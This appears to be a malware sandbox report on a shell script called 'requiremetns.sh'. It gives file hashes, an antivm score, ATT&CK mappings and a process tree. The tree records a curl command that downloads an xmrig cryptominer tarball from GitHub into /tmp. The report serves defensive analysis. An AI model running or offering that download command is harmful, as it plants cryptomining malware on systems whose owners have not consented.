Overview

overview

10

Static

static

1

requiremetns.sh

debian-12-armhf

10

requiremetns.sh

debian-12-mipsel

10

requiremetns.sh

debian-9-armhf

6

requiremetns.sh

debian-9-mips

10

requiremetns.sh

debian-9-mipsel

10

requiremetns.sh

ubuntu-18.04-amd64

6

requiremetns.sh

ubuntu-20.04-amd64

10

requiremetns.sh

ubuntu-22.04-amd64

10

requiremetns.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    149s
  • max time network
    8s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    01-07-2024 08:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    requiremetns.sh

  • Size

    8KB

  • MD5

    97423634cc1762b2f010cb860e7fb47d

  • SHA1

    2f50775e8fe9ab98a80f06d835c5874091bf0b3e

  • SHA256

    d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

  • SHA512

    bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f

  • SSDEEP

    192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score
6/10
antivm

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/requiremetns.sh
    /tmp/requiremetns.sh
    1⤵
      PID:673
      • /usr/bin/cut
        cut -f1 -d.
        2⤵
          PID:681
        • /usr/bin/nproc
          nproc
          2⤵
            PID:684
          • /usr/bin/curl
            curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            PID:688

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Virtualization/Sandbox Evasion

        1
        T1497

        Credential Access

        Discovery

        Virtualization/Sandbox Evasion

        1
        T1497

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Web Service

        1
        T1102

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads